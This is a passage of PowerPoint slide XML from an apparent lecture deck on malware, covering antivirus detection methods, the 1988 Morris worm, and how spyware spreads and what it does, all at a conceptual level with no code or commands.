            <a:ext cx="8804787" cy="4644328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Integrity checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Verify one-way function (hash) of program binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Problem: what if the virus changes that, too?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Behavioral checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Anti-virus program lives in memory and intercepts system calls to prevent certain behaviors by programs (overwriting boot sector, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Problem: what about programs that can legitimately do these things?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Avoid viruses by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Having a good (secure) OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Installing only shrink-wrapped software (just hope that the shrink-wrapped software isn’t infected!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Using antivirus software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Not opening email attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Recovery from virus attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hope you made a recent backup!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Recover by halting computer, rebooting from safe disk (CD-ROM?), using an antivirus program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17035519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Worms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Viruses require other programs to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worms are self-running (separate process)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The 1988 Internet Worm by a Cornell grad student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rober</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Morris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consisted of two programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bootstrap to upload worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The worm itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploited bugs in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and finger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worm first hid its existence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next replicated itself on new machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brought the Internet (1988 version) to a screeching halt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Author was sentenced to 3-years of probation, $10,000 fine, and 400 hrs of community service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Later got PhD from Harvard, and became professor at MIT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1546849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0" y="542611"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1677395"/>
            <a:ext cx="8204200" cy="4605337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Description:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Surreptitiously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>loaded onto a PC without the owner’s knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Runs in the background doing things behind the owner’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Characteristics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hides, victim cannot easily find</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Collects data about the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Communicates the collected information back to its distant master</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tries to survive determined attempts to remove it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24888513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130629" y="404419"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>How Spyware Spreads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="494071" y="1809135"/>
            <a:ext cx="8204200" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Same as malware, Trojan horse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Drive-by download, visit an infected web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-266700" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web pages tries to run an .exe file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-266700" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unsuspecting user installs an infected toolbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="990600" lvl="1" indent="-266700" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ActiveX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>controls get installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3392541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0" y="595554"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Actions Taken by Spyware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="523567" y="1839554"/>
            <a:ext cx="8204200" cy="4676775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Change the browser’s home page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Modify the browser’s list of favorite (bookmarked) pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Add new toolbars to the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Change the user’s default media player.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Change the user’s default search engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Add new icons to the Windows desktop.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Replace banner ads on Web pages with those the spyware picks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Put ads in the standard Windows dialog boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Generate a continuous and unstoppable stream of pop-up ads.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218183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695DF4A6-E995-481D-8451-33463A9667D2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="525215"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
